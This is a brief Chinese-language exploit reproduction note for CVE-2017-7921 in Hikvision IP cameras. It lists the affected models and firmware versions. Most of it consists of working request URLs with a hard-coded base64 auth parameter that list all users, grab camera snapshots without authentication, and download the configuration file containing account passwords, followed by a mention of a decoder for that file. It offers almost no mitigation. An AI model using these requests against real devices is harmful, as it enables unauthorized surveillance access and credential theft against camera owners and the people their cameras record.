海康威视CVE-2017-7921
漏洞概述
通过构造url进行检索所有用户、屏幕截图、配置文件下载
漏洞危害等级:中危
影响版本
-
HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
-
版本至5.4.0build160530版本;
-
DS-2CD2xx0F-ISeries5.2.0build140721
-
版本至5.4.0Build160401版本;
-
DS-2CD2xx2FWDSeries5.3.1build150410
-
版本至5.4.4Build161125版本;
-
DS-2CD4x2xFWDSeries5.2.0build140721
-
版本至5.4.0Build160414版本;
-
DS-2CD4xx5Series5.2.0build140721
-
版本至5.4.0Build160421版本;
-
DS-2DFxSeries5.2.0build140805
-
版本至5.4.5Build160928版本;
-
DS-2CD63xxSeries5.0.9build140305
-
版本至5.3.5Build160106版本
基础环境
| 组件 | 版本 |
|---|---|
| os | win7 |
| web | IE |
漏洞复现
url命令:
IP/Security/users?auth=YWRtaW46MTEK
检索所有用户及其角色的列表
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
获取相机快照而不进行身份验证
IP/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头配置账号密码文件
得到二进制配置文件:configurationFile
configurationfile文件解码器